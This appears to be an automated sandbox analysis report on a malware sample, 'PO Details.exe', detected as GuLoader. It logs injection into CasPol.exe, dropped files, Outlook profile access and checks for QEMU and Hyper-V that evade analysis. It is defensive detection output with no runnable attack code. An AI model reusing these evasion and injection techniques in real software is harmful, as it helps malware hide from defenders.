Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1D119548	11_2_1D119548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_20300040	11_2_20300040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_2030E490	11_2_2030E490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_20301D00	11_2_20301D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_20307F58	11_2_20307F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_2030D4D0	11_2_2030D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_2030D120	11_2_2030D120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_203086AE	11_2_203086AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_203087A0	11_2_203087A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 1D11D148 appears 53 times

Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A93737 NtResumeThread,	1_2_02A93737
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A929CF NtProtectVirtualMemory,	1_2_02A929CF
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A91137 NtAllocateVirtualMemory,	1_2_02A91137

Source: lang-1038.dll.1.dr

Static PE information: No import functions for PE file found

Source: C:\Users\user\Desktop\PO Details.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: PO Details.exe

Static PE information: invalid certificate

Source: PO Details.exe

Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\PO Details.exe

File read: C:\Users\user\Desktop\PO Details.exe

Jump to behavior

Source: PO Details.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO Details.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO Details.exe "C:\Users\user\Desktop\PO Details.exe"
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO Details.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

1_2_004034C5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO Details.exe

File created: C:\Users\user\AppData\Local\Temp\nsm7CC8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/5@2/2

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_004021A2 CoCreateInstance,

1_2_004021A2

Source: C:\Users\user\Desktop\PO Details.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_00404858 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404858

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO Details.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000B.00000000.9159098774.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A84A80 push edx; iretd	1_2_02A84AAC
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A833BE push es; iretd	1_2_02A8343C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A83FDD push 82477AD5h; retn 0008h	1_2_02A84007
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8343D push es; iretd	1_2_02A8343C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8343D push ss; iretd	1_2_02A83466
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A85833 push FFFFFFF5h; retf 0BB5h	1_2_02A8D66C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8544C push edi; ret	1_2_02A8544E
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A91DBB push 82477AD5h; retn 0008h	1_2_02A84007
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8551B push ebp; iretd	1_2_02A8551C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A4A40D push eax; retf	11_2_00A4A40E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A4270A push esp; retf	11_2_00A42711

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_6E491B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6E491B5F

Source: C:\Users\user\Desktop\PO Details.exe	File created: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\PO Details.exe	File created: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll			Jump to dropped file

Source: C:\Users\user\Desktop\PO Details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO Details.exe, 00000001.00000002.9298982245.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: PO Details.exe, 00000001.00000002.9298982245.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: PO Details.exe, 00000001.00000002.9297788884.0000000000788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
Source: PO Details.exe, 00000001.00000002.9298129277.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4064

Thread sleep time: -7378697629483816s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\PO Details.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_02A80EA2 rdtsc

1_2_02A80EA2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9467

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_1D110C40 sldt word ptr [eax]

11_2_1D110C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_0040676F FindFirstFileW,FindClose,	1_2_0040676F
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405B23
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_00402902 FindFirstFileW,	1_2_00402902

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe	API call chain: ExitProcess graph end node			graph_1-16765
Source: C:\Users\user\Desktop\PO Details.exe	API call chain: ExitProcess graph end node			graph_1-16917

Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\PO Details.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO Details.exe, 00000001.00000002.9298982245.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.13997166968.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.13996125718.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PO Details.exe, 00000001.00000002.9298982245.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: PO Details.exe, 00000001.00000002.9297788884.0000000000788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: PO Details.exe, 00000001.00000002.9298129277.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: PO Details.exe, 00000001.00000002.9299619825.00000000046E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_6E491B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6E491B5F

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_02A80EA2 rdtsc

1_2_02A80EA2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8A6F9 mov eax, dword ptr fs:[00000030h]	1_2_02A8A6F9
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8A0F1 mov eax, dword ptr fs:[00000030h]	1_2_02A8A0F1
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A900C6 mov eax, dword ptr fs:[00000030h]	1_2_02A900C6
